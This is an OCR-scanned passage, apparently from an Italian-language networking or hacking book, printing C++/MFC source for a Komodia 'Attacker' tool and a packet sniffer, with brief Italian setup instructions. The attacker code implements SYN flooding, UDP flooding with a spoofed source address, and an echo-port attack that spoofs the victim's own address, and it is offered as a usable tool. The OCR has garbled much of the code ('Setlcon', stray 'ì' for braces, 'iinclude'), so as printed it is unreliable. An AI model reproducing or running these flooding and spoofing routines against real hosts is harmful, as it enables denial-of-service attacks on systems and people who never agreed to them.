protected: 

//{ (AFX__MSG (CAboutDlg) 

//} }AFX_MSG 

DECLARE_MESSAGE_MAP () 
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}; 

CAboutDlg: : CAboutDlg () : CDialog (CAboutDlg : : IDD) 
{ 

//( {AFX_DATA_INIT (CAboutDlg) 
//} }AFX_DATA_INIT 

ì 

void CAboutDlg: : DoDataExchange (CDataExchange* pDX) 
{ 

CDialog: : DoDataExchange (pDX) ; 
//{{AFX_DATA_MAP (CAboutDlg) 
//} }AFX_DATA_MAP 

ì 

BEGIN_MESSAGE_MAP (CAboutDlg, CDialog) 

//{{AFX_MSG_MAP (CAboutDlg) 

// No message handlers 

//} }AFX_MSG_MAP 
END_MESSAGE_MAP () 

///////////////////////////////////////////////////////////////////////////// 
// CAttackerDlg dialog 

CAttackerDlg: : CAttackerDlg (CWnd* pParent /*=NULL*/) 
: CDialog (CAttackerDlg :: IDD, pParent) 

{ 

//{ (AFX_DATA_INIT (CAttackerDlg) 
m_Packets = 0; 
m_SourcePort = 0; 
m_DestinationPort = 0; 
m_AttackType = —1; 
m_TcpOptions = FALSE; 
m_IPOptions = FALSE; 
//} }AFX_DATA_INIT 

// Note that Loadlcon does not require a subsequent Destroylcon in Win32 
m_hIcon = AfxGetApp () ->LoadIcon (IDR_MAINFRAME) ; 

ì 

void CAttackerDlg: -.DoDataExchange (CDataExchange* pDX) 
{ 

CDialog: : DoDataExchange (pDX) ; 

//{{AFX_DATA__MAP (CAttackerDlg) 

DDX_Control (pDX, IDC^SOURCEIP, m_SourceIP) ; 

DDX_Control (pDX, IDC^DESTINATIONIP , m_DestinationIP) ; 

DDX_Text (pDX, IDC_PACKETS, m_Packets) ; 

DDV_MinMaxInt (pDX, m_Packets, 1, 65000); 

DDX Text (pDX, IDC^SOURCEPORT , m_SourcePort) ; 

DDX_Text (pDX, IDC_DESTINATIONPORT, m_DestinationPort) ; 

DDX_Radio (pDX, IDC_SYNATTACK , m_AttackType) ; 

DDX_Check(pDX, IDC_TCPOPTIONS, m_TcpOptions) ; 

DDX_Check (pDX, IDC^IPOPTIONS, m__IPOptions) ; 

//} }AFX_DATA_MAP 

) 

BEGIN__MESSAGE_MAP (CAttackerDlg, CDialog) 

/ / { {AFX_MSG__MAP (CAttackerDlg) 

ON_WM_SYSCOMMAND () 

ON_WM_PAINT() 

0N_ WM_QUER YDRAGICON ( ) 

ON_BN__CLICKED (IDC^SEND, OnSend) 

ON_BN_ CLICKED (IDQuit , OnQuit) 

//} }AFX_MSG_MAP 
END_MESSAGE_MAP () 

///////////////////////////////////////////////////////////////////////////// 
// CAttackerDlg message handlers 

BOOL CAttackerDlg: : OnlnitDialog () 
{ 

CDialog: -.OnlnitDialog () ; 

// Add "About . . . " menu item to system menu. 

// IDM_ABOUTBOX must be in the system command range. 
ASSERT ( (IDM_ABOUTBOX & OxFFFO) == IDM_ABOUTBOX) ; 
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CMenu* pSysMenu = GetSystemMenu (FALSE) ; 

if (pSysMenu != NULL) 

{ 

CStrlng strAboutMenu; 

strAboutMenu . LoadString (IDS^ABOUTBOX) ; 

if (! strAboutMenu. IsEmpty () ) 

{ 

pSysMenu->AppendMenu (MF^SEPARATOR) ; 

pSysMenu->AppendMenu (MFSTRING, IDM_ABOUTBOX, strAboutMenu) ; 

) 

} 

// Set the icon for this dialog. The framework does this automatically 
// when the application ' s main window is not a dialog 
Setlcon (m_hIcon, TRUE) ; // Set big icon 

Setlcon (mhlcon, FALSE) ; // Set small icon 

// TODO: Add extra initialization here 

return TRUE; // return TRUE unless you set the focus to a control 

ì 

void CAttackerDlg : :OnSysCommand(UINT nID, LPARAM lParam) 
{ 

if ((nID & OxFFFO) == IDM_ABOUTBOX) 
{ 

CAboutDlg dlgAbout; 
dlgAbout . DoModal () ; 

} 

else 
{ 

CDialog: : OnSysCommand (nID, lParam) ; 

} 

} 

// If you add a minimize button to your dialog, you will need the code below 
// to draw the icon. For MFC applications using the document /view model, 
// this is automatically done for you by the framework. 

void CAttackerDlg : -.OnPaint () 
{ 

if (Islconic () ) 
{ 

CPaintDC de (this) ; // device context for painting 

SendMessage (WM_ICONERASEBKGND , (WPARAM) de . GetSafeHdc () , 0) ; 

// Center icon in client rectangle 

int cxlcon = GetSystemMetrics (SM_CXICON) ; 

int cyleon = GetSystemMetrics (SM_CYICON) ; 

CRect rect; 

GetClientRect (Srect) ; 

int x = (rect .Width() - cxlcon + 1) / 2; 
int y = (rect . Height ( ) - cyleon + 1) / 2; 

// Draw the icon 

de . Drawlcon (x, y, m_hIcon) ; 

} 

else 
{ 

CDialog: -.OnPaint () ; 

} 

} 

// The system calls this to obtain the cursor to display while the user drags 

// the minimized window. 

HCURSOR CAttackerDlg: : OnQueryDraglcon () 

{ 

return (HCURSOR) m_Jilcon; 

} 

void CAttackerDlg: :OnSend() 
{ 

//Invalidate (get ali data) 
if (UpdateData (TRUE) ) 
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//Attack 

switch (m__AttackType) 
{ 

case ATTACK SYN : 

SynFlood () ; 

break; 
case ATTACK_ECHO: 

EchoAttack () ; 

break; 
case ATTACK_UDP : 

UDPFlood () ; 

break; 

} 

} 



void CAttackerDlg : -.OnQuit () 
{ 

//qult 

EndDialog (0) ; 

ì 

void CAttackerDlg: : SynFl ood() 
{ 

//Create the tcp socket 
CTCPSocket* tcp; 
tcp=new CTCPSocket () ; 

//Was an error 
BOOL bError=TRUE; 

tcp->SetRaw (TRUE) ; 

if (tcp->Create () ) 
{ 

bError=FALSE ; 

//Set the source IP 

char* cSourcelP; 

cSourceIP=IPCtrlToSTR (&m_SourceIP) ; 

if ( ! cSourcelP) 
//Error 

AfxMessageBox (ERROR__INVALID_SOURCE) ; 

else 
{ 

//Copy source IP 
cSourceIP=__strdup (cSourcelP) ; 

char* cDestinationlP ; 

cDestinationIP=IPCtrlToSTR (Sm_DestinationIP) ; 

if (! cDestinationlP) 
{ 

delete cSourcelP ; 
//Error 

AfxMessageBox (ERROR_INVALID_DESTINATION) ; 

} 

else 
( 

bError=TRUE; 
//Let ' s attack 

tcp->SetSourceAddress (cSourcelP) ; 
tcp->Bind (cSourcelP) ; 

if (m_IPCptions) 

SetlPOptions (tcp) ; 

//Check if allowing TCP options 

if (m_TcpOptions) 

{ 

tcp->SetTCPOptions (TRUE) ; 

tcp->GetTCPOptions () ->AddOption__Nothing() ; 
tcp->GetTCPOptions () —>AddOption_ENDLIST ( ) ; 
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for (int ±Count=l ; iCount<=m_Packets ; ±Count++) 
if (tcp- 

>Connect (mSourcePort , cDestinationlP, m DestinationPort) ) 

//OK 

bError=FALSE; 



delete cSourcelP ; 



if (bError) 

//Display error 
DisplaySocketError (tcp) ; 



tcp->Close () ; 
delete tcp; 



void CAttackerDlg: : DisplaySocketError (CSpoof Socket *sock) 
{ 

//Display an error 
char* cErr; 
cErr=new char [10] ; 

itoa (sock->GetLastError () , cErr, 10) ; 



char* cMsg; 

clisg=new char [40] ; 

strcpy (cMsg, "Winsock error : ") ; 

strcat (cMsg, cErr) ; 



AfxMessageBox (cMsg) ; 

delete cMsg; 
delete cErr; 



LPSTR CAttackerDlg :: IPCtrlToSTR (CIPAddressCtrl* etri) 
{ 

//Converts the control address to textual address 

//Convert bytes to string 

BYTE bOctetl; 

BYTE b0ctet2; 

BYTE b0ctet3; 

BYTE b0ctet4; 

//Get the value and blank values 
int iBlank; 

iBlank=ctrl->GetAddress (bOctetl , b0ctet2 , b0ctet3 , bOcteté ) ; 



if (iBlank! =4) 

//Hot filled 
return NULL; 

else 
{ 

in_addr iAddr; 

iAddr. S_un . S_un_b. s_bl=bOctetl ; 
iAddr. S_un . S_un_b. S_b2=b0ctet2 ; 
iAddr. S_un . S_un_b. s_b3=bOctet3 ; 
iAddr. S_un . S_un_b. s_b4=bOctet4 ; 



return inet_ntoa (iAddr) ; 



void CAttackerDlg: : VDPF1 ood() 
{ 

/ /Create the udp socket 
CUDPSocket* udp; 
udp=new CUDPSocket () ; 



udp->SetRaw(TRUE) ; 

//Was an error 
BOOL bError=TRUE; 
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bError=FALSE ; 

//Set the source IP 
char* cSourcelP; 

cSourceIP=IPCtrlToSTR (Sm_SourceIP) ; 

if ( ! cSourcelP) 
//Error 

AfxMessageBox (ERROR_INVALID_SOURCE) ; 

else 
{ 

//Copy source IP 
cSourceIP=_strdup (cSourcelP) ; 

char* cDestinationlP ; 

cDestinationIP=IPCtrlToSTR (Sm_DestinationIP) ; 

if (! cDestinationlP) 
{ 

delete cSourcelP ; 
//Error 

AfxMessageBox (ERROR_INVALID_DESTINATION) ; 

} 

else 
{ 

bError=TRUE ; 

if (m_IPOptions) 

SetlPOptions (udp) ; 

//Let ' s attack 

udp->SetSourceAddress (cSourcelP) ; 
//Flood text 

char cFlood[] = "TCP/IP library flooding! ! ! " ; 

for (int iCount=l ; iCount<=m \_Packets ; iCount++) 
if (udp- 

>Send (m SourcePort , cDestinationlP , m_DestinationPort , cFlood, strlen (cFlood) +1) ) 

//OK 

bError=FALSE; 
delete cSourcelP ; 

} 

} 

} 



) 



if (bError) 

//Display error 
DisplaySocketError (udp) ; 

udp->Close () ; 
delete udp; 



void CAttackerDlg: : EchoAttack ( ) 
{ 

//Create the udp socket 
CUDPSocket* udp; 
udp=new CUDPSocket () ; 

udp->SetRaw (TRUE) ; 

//Was an error 
BOOL bError=TRUE; 

if (udp->Create () ) 
{ 

bError=FALSE ; 



char* cDestinationlP ; 

cDestinationIP=IPCtrlToSTR(£m_DestinationIP) ; 



if ( ! cDestinationlP) 
//Error 
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else 






{ 


bError=TRUE; 

if (m_IPOptions) 

SetlPOptions (udp) ; 

//Let 's attack 

udp->SetSourceAddress (cDestinationlP) ; 
char msg [10] = "Die echo"; 




} 


for (int iCount=l ; iCount<=m_Packets ; iCount++) 

if (udp->Send (7, cDestinationlP, 7, msg, strlen (msg) ) ) 
//OK 

bError=FALSE ; 




} 

if (bError) 

//Display error 
DisplaySocketError (udp) ; 


; 


udp->Close () ; 
delete udp; 




void CAttackerDlg :: SetlPOptions (CSpoof Socket *sok) 


i 


//Add options 
sok->SetOptions (TRUE) ; 

sok->GetOptions () ->AddOption_Security (IPOption_SECURITY_TOPSECRET) ; 
sok->GetOptions () ->AddOption_Stream (1) ; 

tRouting rRT; 
rRT . iRoutes=l ; 

rRT. ulRoutes [ 0 ] =inet_addr ("127 . 0.0.1") ; 


} 


sok->GetOptions () ->AddOption_LooseRoute (rRT) ; 
sok->GetOptions () ->AddOption__RecordRoute (1) ; 
sok->GetOptions () ->AddOption_ENDLIST () ; 



Esistono ancora due file .CPP e .H creati dal Visual Studio richiendendo di creare un 
applicativo basato sulla dialog tramite il class wizard. 

In altre parole quando attivate Visual Studio richiedete di creare un applicazione basata sulla 
dialog. 

Il sistema di sviluppo creerà un applicativo con all'interno una dialog di default. 

Potete prendere la risorsa della dialog definita dentro al file .RC e sostituirla a quella creata 

da Visual Studio. 

Un esempio di SNIFFER in grado di catturare dati è il seguente. 

La creazione deve essere fatta partendo da un progetto nuovo generato in MFC basato sulla 
dialog la quale ha il seguente layout. 
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Il contenuto del file .RC è il seguente : 



//Microsoft Developer Studio generateci resource script. 




// 




iinclude "resource. h" 




idefine APSTUDIO_READONLY_SYMBOLS 




///////////////////////////////////////////////////////////////////////////// 


// 




// Generated front the TEXTINCLUDE 2 resource. 




// 




iinclude "afxres.h" 




///////////////////////////////////////////////////////////////////////////// 


iundef APSTUDIO_READONLY_SYMBOLS 




///////////////////////////////////////////////////////////////////////////// 


// English (U.S.) resources 




#if !defined(AFX_RESOURCE_DLL) Il defined (AFX TARG ENU) 




iifdef _WIN32 




LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US 




ipragma code _page (1252) 




iendif //_WIN32 




///////////////////////////////////////////////////////////////////////////// 


// 




// Dialog 




// 




IDD_ABOUTBOX DIALOG DISCARDABLE 0, 0, 235, 77 




STYLE DS_MODALFRAME / WS_POPUP / WS_CAPTION / WS_SYSMENU 




CAPTION "About KSniffer" 




FONT 8, "MS Sans Serif" 




BEGIN 




ICON IDR_MAINFRAME, IDC_STATIC, 11,17, 21, 20 




DEFPUSHBUTTON "OK", IDOK, 1 78, 7, 50,14, WS^GROUP 




LTEXT "Attacker Version 1.0", IDC^STATIC, 48, 16,81,9 


LTEXT "copyright (C) 2001, Komodia Inc.",IDC_ 
9 


STATIC,48,28,109, 


LTEXT "http : //www. komodia . com ", IDC_STATIC, 48, 


41,103,10 


LTEXT "barak@komodia . com ", IDC_STATIC, 48, 53, 88 


,11 


END 




IDD_KSNIFFER_DIALOG DIALOGEX 0, 0, 281, 170 




STYLE DS_MODALFRAME / WS_POPUP / WS_VISIBLE / WS_CAPTION / 


WS_SYSMENU 


EXSTYLE WS_EX_APPWINDOW 




CAPTION "Komodia sniffer" 




FONT 8, "MS Sans Serif" 




BEGIN 




DEFPUSHBUTTON "Sniff", ID_SNIFF, 90,27, 50, 14 




PUSHBUTTON "Quit ", IDCANCEL, 90, 43, 50, 14 




LISTBOX IDC_INTERFACELIST, 13,27, 69, 40, LBS_SORT 


1 


LBS_NOINTEGRALHEIGHT / WS_VSCROLL / WS_ 


TABSTOP 
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LISTBOX IDC_DATALIST,13,92,252,65,LBS_NOINTEGRALHEIGHT / 

WS_VSCROLL I WS_TABSTOP 
LTEXT "Captured data ", IDC^CAPTUREDSTATIC, 1 7, 80, 66, 8 

CONTROL "Sniff outgoing traff±c",IDC_SNIFFCHECK,"Button", 

BS^AUTOCHECKBOX / WS_TABSTOP, 90, 64, 88, 8 

END 



iifndef _MAC 

///////////////////////////////////////////////////////////////////////////// 
// 

// Ver sion 

// 

VS_VERSION_INFO VERSIONINFO 

FILEVERSION 1,0,0,1 

PRODUCTVERSION 1,0,0,1 

FILEFLAGSMASK 0x3fL 
iifdef _DEBUG 

FILEFLAGS OxlL 
ielse 

FILEFLAGS OxOL 
iendif 

FILEOS 0x4L 

FILETYPE OxlL 

FI LE SUB TYPE OxOL 
BEGIN 

BLOCK "StringFilelnfo " 
BEGIN 

BLOCK "040904B0" 

BEGIN 

VALUE "CompanyName", "\0" 

VALUE "FileDescription" , "KSnlffer MFC Application\0" 

VALUE "FileVersion" , "1, 0, 0, 1\0" 

VALUE "InternalName", "KSniffer\0" 

VALUE "LegalCopyright", "Copyright (C) 2000\0" 

VALUE "LegalTrademarks", "\0" 

VALUE "OriginalFilename" , "KSniffer.EXE\0" 

VALUE "ProductName", "KSniffer Application\0" 

VALUE "ProductVersion", "1, 0, 0, 1\0" 

END 

END 

BLOCK "VarFilelnfo" 
BEGIN 

VALUE "Translation", 0x409, 1200 

END 

END 

#endif // !_MAC 



///////////////////////////////////////////////////////////////////////////// 
// 

// DESIGNINFO 

// 

iifdef APSTUDIO_INVOKED 
GUIDELINES DESIGNINFO DISCARDABLE 
BEGIN 

IDD_ABOUTBOX, DIALOG 
BEGIN 

LEFTMARGIN, 7 
RIGHTMARGIN, 228 
TOPMARGIN, 7 
BOTTOMMARGIN, 70 

END 

IDD__KSNIFFER_DIALOG, DIALOG 
BEGIN 

LEFTMARGIN, 7 

RIGHTMARGIN, 274 

TOPMARGIN, 7 

BOTTOMMARGIN, 163 

END 

END 

iendif // APSTUDIO_INVOKED 
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///////////////////////////////////////////////////////////////////////////// 
// 

// String Table 

// 

STRINGTABLE DISCARDABLE 
BEGIN 

IDS__ABOUTBOX "SAbout KSniffer. . . " 

END 

iendif // English (U.S.) resources 

///////////////////////////////////////////////////////////////////////////// 



///////////////////////////////////////////////////////////////////////////// 
// Unknown language: OxD, Oxl resources 

#if ! defined (AFX_RESOURCE_DLL ) // defined (AFX_ TARG_HEB) 
iifdef _WIN32 
LANGUAGE OxD, Oxl 
ipragma code _j>age (1255) 
iendif //_WIN32 

iifdef APSTUDIO_INVOKED 

///////////////////////////////////////////////////////////////////////////// 
// 

// TEXTINCLUDE 

// 

1 TEXTINCLUDE DISCARDABLE 
BEGIN 

"resource.h\0" 

END 

2 TEXTINCLUDE DISCARDABLE 
BEGIN 

"iinclude " "afxres .h""\r\n" 
"\0" 

END 

3 TEXTINCLUDE DISCARDABLE 
BEGIN 

"idefine _AFX_NO_SPLITTER_RESOURCES\r\n " 
"idefine _AFX_NO_OLE_RESOURCES\r\n " 
"idefine _AFX_NO_ TRACKER_RESOURCES\ r\n " 
"idefine _AFX_NO_PROPERTY_RESOURCES\r\n " 
"\r\n" 

"iif ! defined (AFX_RESOURCE__DLL) Il defined (AFX_TARG_ENU)\r\n" 

"iifdef _WIN32\r\n" 

"LANGUAGE 9, l\r\n" 

"ipragma code_page (1252) \r\n" 

"iendif //_WIN32\r\n" 

"iinclude " "res\\KSniffer . rc2 " " // non— Microsoft Visual C++ edited resources\r\n" 

"iinclude " "afxres . re" " // Standard components\r\n" 

"iendif\r\n" 

"\0" 

END 

iendif // APSTUDIO_INVOKED 



///////////////////////////////////////////////////////////////////////////// 
// 

// Icon 

// 

// Icon with lowest ID value placed first to ensure application icon 
// remains consistent on ali systems. 

IDR_MAINFRAME ICON DISCARDABLE "res\\KSniffer . ico" 

iendif // Unknown language: OxD, Oxl resources 

///////////////////////////////////////////////////////////////////////////// 



Hfndef APSTUDIO_INVOKED 
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// 

// Generateci front the TEXTINCLUDE 3 resource. 

// 

idefine _AFX_NO_SPLITTER_RESOURCES 
idefine _AFX_NO_OLE_RESOURCES 
idefine _AFX_NO_TRACKER_RESOURCES 
idefine _AFX__NO_PROPERTY_RESOURCES 

iif ! defined (AFX_RESOURCE_DLL) Il defined (AFX_ TARG^ENU) 

iifdef _WIN32 

LANGUAGE 9, 1 

ipragma code _page (1252) 

iendif //_WIN32 

iinclude "res\KSniffer . rc2 " // non— Microsoft Visual C++ edited resources 

iinclude "afxres . re" // Standard components 

iendif 

///////////////////////////////////////////////////////////////////////////// 
iendif // not APSTUDIO_INVOKED 

Potete anche copiare la parte relativa alla dialog direttamente sulla dialog creata da Wizard. 
Le funzioni legate alla gestione della dialog sono contenuti dentro al file KsnifferDIg.h e 
KsnifferDIg.cpp i quali hanno i seguenti contenuti. 

// KSnifferDlg.h : header file 

// 

iif ! defined (AFX_KSNIFFERDLG_H 3A7823CD_9839_4564_8B1 7JEE78A2640F8D INCLUDED_) 

idefine AFX_KSNIFFERDLG_H 3A 7823CD_ 9839_4564_ 8B1 7_EE78A2 64 0F8D INCLUDED_ 

iif _MSC__VER > 1000 
ipragma once 

iendif // _MSC_VER > 1000 

///////////////////////////////////////////////////////////////////////////// 
// CKSnifferDlg dialog 

class CClientSocket ; 

class CKSnifferDlg : public CDialog 
{ 

// Construction 
public: 

CKSnifferDlg (CWnd* pParent = NULL) ; // standard constructor 

// Dialog Data 

//{ {AFX^DATA (CKSnifferDlg) 

enum { IDD = IDD_KSNIFFER_DIALOG }; 

CListBox mDataList; 

CListBox m_InterfaceList ; 

BOOL m_Sniff; 

//} }AFX_DATA 

// ClassWizard generated virtual function overrides 

// { {AFX_VIRTUAL (CKSnifferDlg) 

protected: 

virtual void DoDataExchange (CDataExchange* pDX) ; // DDX/DDV support 
//} }AFX_VIRTUAL 

// Implementation 
protected: 

HICON m^hlcon; 

// Generated message map functions 
//{ {AFX_MSG (CKSnifferDlg) 
virtual BOOL OnlnitDialog () ; 

afx_msg void OnSysCommand (UINT nID, LPARAM IParam) ; 
afx_msg void OnPaintO; 
afx_msg HCURSOR OnQueryDraglcon () ; 
afx_msg void OnDestroy () ; 
afx_msg void OnSniff () ; 
afx msg void OnSniff check () ; 
//} }AFX_MSG 
DECLARE_MESSAGE_MAP () 
private: 
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BOOL BuildlnterfaceList () ; 
CClientSocket* m_Socket; 

}; 

//{ {AFX_INSERT_LOCATION} } 

// Microsoft Visual C++ will insert additional declarations immediately before the 
previous line . 

Il file .cpp invece contiene : 

// KSnifferDlg. cpp : implementation file 

// 

iinclude "stdafx.h" 
iinclude "KSniffer.h" 
iinclude "KSnifferDlg.h" 
iinclude "ClientSocket . h " 

iinclude " . . \Interfaces . h " 

Hfdef _DEBUG 
idefine new DEBUG_NEW 
iundef THIS_FILE 

static char THIS_FILE[] = FILE ; 

iendif 

///////////////////////////////////////////////////////////////////////////// 
// CAboutDlg dialog used for App About 

class CAboutDlg : public CDialog 
{ 

public: 

CAboutDlg () ; 

// Dialog Data 

//{ {AFX_DATA (CAboutDlg) 
enum { IDD = IDD_ABOUTBOX } ; 
//} }AFX_DATA 

// ClassWizard generated virtual function overrides 

//{ {AFX_VIRTUAL (CAboutDlg) 

protected: 

virtual void DoDataExchange (CDataExchange* pDX) ; // DDX/DDV support 
//} }AFX_VIRTUAL 

// Implementation 
protected: 

//{ (AFX_MSG (CAboutDlg) 

//} }AFX_MSG 

DECLARE__MESSAGE_MAP () 

}; 

CAboutDlg: : CAboutDlg () : CDialog (CAboutDlg: : IDD) 
{ 

// { {AFX_DATA_INIT (CAboutDlg) 
//} }AFX_DATA_INIT 

ì 

void CAboutDlg: : DoDataExchange (CDataExchange* pDX) 
{ 

CDialog: : DoDataExchange (pDX) ; 
//{ {AFX_DATA_MAP (CAboutDlg) 
//} }AFX_DATA_MAP 

) 

BEGIN_MESSAGE_MAP (CAboutDlg, CDialog) 

//{ {AFX_MSG_MAP (CAboutDlg) 

// No message handlers 

//} }AFX_MSG_MAP 
END_MESSAGE_MAP () 

///////////////////////////////////////////////////////////////////////////// 
// CKSnifferDlg dialog 
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CKSnifferDlg: : CKSnifferDlg (CWnd* pParent /*=NULL*/) 
: CDialog (CKSnifferDlg : :IDD, pParent) 

{ 

//{ {AFX_DATA_INIT (CKSnifferDlg) 
m_Sniff = FALSE; 
//} }AFX_DATA_INIT 

// Note that Loadlcon does not require a subsequent Destroylcon in Win32 
m_hIcon = AfxGetApp ( )->LoadIcon (IDR^MAINFRAME) ; 

} 

void CKSnifferDlg: : DoDataExchange (CDataExchange* pDX) 
{ 

CDialog: : DoDataExchange (pDX) ; 

//{{AFX_DATA_MAP (CKSnifferDlg) 

DDX_Control (pDX, IDC_DATALIST , m_DataList) ; 

DDX_Control (pDX, IDC_ INTERFACELIST, m_InterfaceList) ; 

DDX_Check(pDX, IDC_SNIFFCHECK, m_Sniff); 

//} }AFX_DATA_MAP 

) 

BEGIN_MESSAGE__MAP (CKSnifferDlg, CDialog) 
// { (AFX__MSG_MAP (CKSnifferDlg) 
ON_WM_SYSCOMMAND () 
ON_WM_PAINT() 
0N_ WM_ QUER YDRAGICON ( ) 
0N_ WM_DESTROY ( ) 

ON_BN__CLICKED (ID^SNIFF, OnSniff) 
ON_BN_CLICKED (IDC_SNIFFCHECK, OnSniff check) 
//} }AFX_MSG_MAP 
END_MESSAGE_MAP () 

///////////////////////////////////////////////////////////////////////////// 
// CKSnifferDlg message handlers 

BOOL CKSnifferDlg: : OnlnitDialog () 
( 

CDialog: : OnlnitDialog ( ) ; 

// Add "About . . . " menu item to system menu. 

// IDM_ABOUTBOX must be in the system command range. 
ASSERT ( (IDM_ABOUTBOX £ OxFFFO) == IDM_ABOUTBOX) ; 
ASSERT (IDM_ABOUTBOX < OxFOOO) ; 

CMenu* pSysMenu = GetSystemMenu (FALSE) ; 

if (pSysMenu != NULL) 

{ 

CString strAboutMenu; 

strAboutMenu . LoadString (IDS__ABOUTBOX) ; 

if (! strAboutMenu. IsEmpty () ) 

{ 

pSysMenu->AppendMenu (MF_SEPARATOR) ; 

pSysMenu->AppendMenu (MF STRING, IDM_ABOUTBOX, strAboutMenu) ; 

) 

} 

// Set the icon for this dialog. The framework does this automatically 
// when the application ' s main window is not a dialog 
Setlcon (m_hIcon, TRUE) ; // Set big icon 

Setlcon (m_Jilcon , FALSE) ; // Set small icon 

//Initialize the socket 

m_Socket=new CClientSocket (&m_DataList) ; 

if (CSpoofBase : : InitializeSockets () ) 
{ 

m_Socket->SetRaw (TRUE) ; 
m_Socket->Create () ; 

} 

else 
{ 

delete m__Socket; 
return FALSE; 

} 

//Build socket list 
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return BuildlnterfaceList () ; // return TRUE unless you set the focus to a 

control 
} 

void CKSnifferDlg: : OnSysCommand (UINT nID, LPARAM lParam) 
{ 

if ((nID & OxFFFO) == IDM_ABOUTBOX) 
{ 

CAboutDlg dlgAbout; 
dlgAbout . DoModal () ; 

} 

else 
{ 

CDialog: : OnSysCommand (nID , lParam) ; 

} 

} 

// If you add a minimize button to your dialog, you wlll need the code below 
// to draw the icon. For MFC applications using the document/view model, 
// this is automatically done for you by the framework. 

void CKSnifferDlg: :OnPaint () 
{ 

if (Islconic () ) 
{ 

CPaintDC de (this) ; // device context for painting 

SendMessage (WM_ICONERASEBKGND, (WPARAM) de . GetSafeHdc () , 0) ; 

// Center icon in client rectangle 

int cxlcon = GetSystemMetrics (SM_CXICON) ; 

int cyleon = GetSystemMetrics (SM_CYICON) ; 

CRect rect ; 

GetClientRect (irect) ; 

int x = (rect.Width() - cxlcon + 1) / 2; 
int y = (rect .Height () - cyleon + 1) / 2; 

// Draw the icon 

de . Drawlcon (x, y, m_hIcon) ; 

} 

else 
( 

CDialog: -.OnPaint () ; 

} 

} 

// The system calls this to obtain the cursor to display while the user drags 

// the minimized window. 

HCURSOR CKSnifferDlg: : OnQueryDraglcon () 

{ 

return (HCURSOR) m_hIcon; 

) 

void CKSnifferDlg: :OnDestroy() 
{ 

CDialog: : OnDestroy () ; 

//Delete the socket 
delete m_Socket; 

//Delete ali 

CSpoofBase : : ShutdownSockets () ; 

} 

BOOL CKSnifferDlg: : BulldlnterfaceList () 
{ 

//Get the list of interfaces 
CInterfaces* plnter; 
plnter=new CInterfaces; 

//Only if we have the interfaces 
if (pInter->GetInterfaces () ) 
{ 

//Build the list 
BOOL bQuit; 
bQuit=FALSE ; 
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while (IbQuit) 
{ 

//Get the interface 
LPSTR lplnterface; 

lpInterface=p!nter->LongToString(pInter->GetAddress () ) ; 
//Add it to the list 

m_InterfaceList . AddString (lplnterface) ; 

//Get next interface 
bQuit=!pInter->MoveNext () ; 

} 

delete plnter; 
return TRUE; 

} 

delete plnter; 
return FALSE; 

ì 

void CKSnifferDlg: :OnSniff() 
{ 

CString strlnterface ; 

m_InterfaceList . GetText (m_InterfaceList . GetCurSel () , strlnterface) ; 

//Get the string 
//Bind to an interface 
if (m_Socket->Bind (strlnterface) ) 
//Sniff 

m_Socket->Sniff (TRUE) ; 

) 

void CKSnifferDlg : : OnSniff check () 
{ 

VpdateData (TRUE) ; 

m_Socket->CaptureOutgoing (m_Sniff) ; 

} 

Lo sniffer utilizza anche un classe che deriva da quella della libreria CsniffSocket. 
Questa classe di interessa della gestione della parte client relativa al socket. 
L'header ovvero il file .h ha come contenuto : 

// ClientSocket . h : interface for the CClientSocket class. 

// 

////////////////////////////////////////////////////////////////////// 

#if ! defined (AFX_CLIENTSOCKET_H 4BC89B30_1C8E_4022_B1A9_806ED855D346 INCLUDED_) 

idefine AFX_CLIENTSOCKET_H 4BC89B30_1C8E_4022_B1A9_806ED855D346 INCLUDED_ 

#if _MSC_VER > 1000 
ipragma once 

iendif // _MSC_VER > 1000 

iinclude " . . \Sniff Socket . h " 

class CClientSocket : public CSniff Socket 
{ 

public: 

//Do we need to capture outgoing traffic as well 
void CaptureOutgoing (BOOL bCapture) ; 

//Bind to a specific address 

virtual BOOL Bind(LPCSTR IpSourceAddress , int iPort=0) ; 
//ctor and dtor 

CClientSocket (CListBox* pList) ; 
virtual ~CClientSocket () ; 
protected: 

virtual BOOL OnSocketReceive (int iErrorCode) ; 
private: 

/ /Analyze the headers 
void AnalyzeTCP (char* cTCPBuffer) ; 
void AnalyzeUDP (char* cUDPBuffer) ; 
void AnalyzeICMP (char* cICMPBuffer) ; 
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ì; 


//The list box 
CListBox* m_pList; 

//The address 
LPSTR m_lpAddress ; 

//Do we need to capture outgoing traffic 
BOOL m_bOutgoing; 




iendif 


// 





Il file .CPP invece è il seguente : 

// ClientSocket . cpp : implementation of the CClientSocket class. 

// 

////////////////////////////////////////////////////////////////////// 

iinclude "stdafx.h" 

iinclude "KSniffer.h" 

iinclude "ClientSocket . h " 

//These includes are only to get the header definition 

iinclude " . . \ TCPSocket . h " 

iinclude " . . \ UDPSocket . h " 

iinclude " . . \ICMPSocket . h " 

iifdef _DEBUG 
iundef THIS_FILE 

static char THIS_FILE[]= FILE ; 

idefine new DEBUG_NEW 
iendif 

////////////////////////////////////////////////////////////////////// 
// Construction/Destruction 

////////////////////////////////////////////////////////////////////// 

CClientSocket : : CClientSocket (CListBox* pList) : CSniff Socket () 
{ 

m_pList=pList ; 

m_lpAddress=NULL; 

m_bOutgoing=FALSE; 

} 

CClientSocket : : ~CClientSocket () 
{ 

free (m_lpAddress) ; 

} 

BOOL CClientSocket : : Bind (LPCSTR IpSourceAddress , int iPort) 
{ 

if ( ! CSpoof Socket : : Bind (IpSourceAddress , iPort) ) 
return FALSE; 

else 
( 

//Check we are no rebinding 
if (m lpAddress) 

free (m_lpAddress) ; 

//Save the data 

m_lpAddress=strdup (IpSourceAddress) ; 
return TRUE; 

} 

} 

BOOL CClientSocket : : OnSocketReceive (int iErrorCode) 
{ 

int iReceive; 

char cBuffer [2000] ; 

//First receive the IP address 
IpHeader ipHeader; 
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if (iReceive==-l) 

return FALSE; 

//Copy the header 

memcpy (S ipHeader , cBuffer, IpHeaderLength) ; 
//Check the packet is addresses to us 

LPSTR lpAddress=CSpoofSocket : : LongToStrlng (IpHeader . sourcelPAddress) ; 

//Check the data is not from us (altough someone may want to save this data) 
long ICapture; 

if ( (lCapture=strcmp (lpAddress,m_lpAddress) ) Il m_bOutgoing) 
{ 

CString strlnfo; 

if (UCapture) 
{ 

strInfo="Sending packet to: "; 

str In fo+=CSpoof Socket : : LongToString (ipHeader . destlPAddress) ; 

} 

else 
{ 

strInfo="Received packet from: "; 
strInfo+=lpAddress; 

} 

strInfo+=", Protocol:"; 
CString strProtocol; 

if (ipHeader . Protocol==IPPROTO_TCP) 

